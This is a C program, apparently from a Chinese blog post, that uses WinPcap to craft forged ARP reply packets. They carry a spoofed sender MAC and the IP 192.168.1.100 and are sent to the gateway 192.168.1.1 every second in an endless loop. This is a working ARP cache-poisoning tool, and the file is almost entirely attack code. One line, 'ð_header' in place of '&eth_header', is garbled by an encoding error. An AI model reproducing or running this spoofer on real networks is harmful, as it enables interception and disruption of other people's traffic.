#include <stdlib.h>
#include <stdio.h>
#include <pcap.h>
//以太网头
typedef struct _ethhdr
{
/* 先是目的MAC再才是本地MAC,此错误捆饶多年,警惕 */
u_char daddr[6]; //6字节目的MAC地址
u_char saddr[6]; //6字节本地MAC地址
unsigned short ptype; //2字节协议类型
}ETH_HEADER;
typedef struct _arp
{
u_short hardType;
u_short protocolType;
u_char hardLength;
u_char proLength;
u_short operation;
u_char saddr[6];
u_char sourceIP[4];
u_char daddr[6];
u_char destIP[4];
}ARPHEADER;
int main(int argc, char **argv)
{
pcap_t *fp;
char errbuf[PCAP_ERRBUF_SIZE];
u_char packet[64];
ETH_HEADER eth_header;
ARPHEADER arp_header;
/* Check the validity of the command line */
if (argc != 2)
{
printf("usage: %s interface", argv[0]);
return 1;
}
/* Open the adapter */
if ((fp = pcap_open_live(argv[1], // name of the device
65536, // portion of the packet to capture. It doesn't matter in this case
1, // promiscuous mode (nonzero means promiscuous)
1000, // read timeout
errbuf // error buffer
)) == NULL)
{
fprintf(stderr,"\nUnable to open the adapter. %s is not supported by WinPcap\n", argv[1]);
return 2;
}
/* 填充以太网头 */
/* 00-0F-FE-1F-BD-A2 */
/* 00-40-D0-7C-8C-08 */
//实验表明MAC可以伪造,但IP不可以伪造
eth_header.daddr[0] = 0x00;
eth_header.daddr[1] = 0x14;
eth_header.daddr[2] = 0x78;
eth_header.daddr[3] = 0x67;
eth_header.daddr[4] = 0x1C;
eth_header.daddr[5] = 0xFA;
/*eth_header.daddr[0] = 0x00;
eth_header.daddr[1] = 0x0F;
eth_header.daddr[2] = 0xFE;
eth_header.daddr[3] = 0x1F;
eth_header.daddr[4] = 0xBE;
eth_header.daddr[5] = 0x1B;*/
eth_header.saddr[0] = 0x00;
eth_header.saddr[1] = 0x0F;
eth_header.saddr[2] = 0xFE;
eth_header.saddr[3] = 0x1F;
eth_header.saddr[4] = 0xBD;
eth_header.saddr[5] = 0xA2;
eth_header.ptype=htons(0x0806);
arp_header.hardType = htons(0x0001);
arp_header.protocolType = htons(0x0800);
arp_header.hardLength = 6;
arp_header.proLength = 4;
arp_header.operation = htons(0x0002);
arp_header.saddr[0] = 0x00;
arp_header.saddr[1] = 0x0F;
arp_header.saddr[2] = 0xFE;
arp_header.saddr[3] = 0x1F;
arp_header.saddr[4] = 0xBD;
arp_header.saddr[5] = 0xA2;
arp_header.sourceIP[0] = 192;
arp_header.sourceIP[1] = 168;
arp_header.sourceIP[2] = 1;
arp_header.sourceIP[3] = 100;
arp_header.daddr[0] = 0x00;
arp_header.daddr[1] = 0x14;
arp_header.daddr[2] = 0x78;
arp_header.daddr[3] = 0x67;
arp_header.daddr[4] = 0x1C;
arp_header.daddr[5] = 0xFA;
arp_header.destIP[0] = 192;
arp_header.destIP[1] = 168;
arp_header.destIP[2] = 1;
arp_header.destIP[3] = 1;
memset(packet, 0, 64);
memcpy(packet, ð_header, sizeof(eth_header));
memcpy(packet + sizeof(eth_header), &arp_header, sizeof(arp_header));
int datasize = sizeof(eth_header) + sizeof(arp_header);
while(1)
{
Sleep(1000);
if(pcap_sendpacket(fp, packet, datasize) == 0)
{
printf("Send the first part\n");
}
}
/*while(1)
{
Sleep(1000);
pcap_sendpacket(fp, // Adapter
packet, // buffer with the packet
datasize // size
);
printf("send\n");
}*/
/* Send down the packet */
/* if (pcap_sendpacket(fp, // Adapter
packet, // buffer with the packet
datasize // size
) != 0)
{
fprintf(stderr,"\nError sending the packet: \n", pcap_geterr(fp));
return 3;
}
else
{
printf("send succuss.\n");
}*/
pcap_close(fp);
return 0;
}
评论0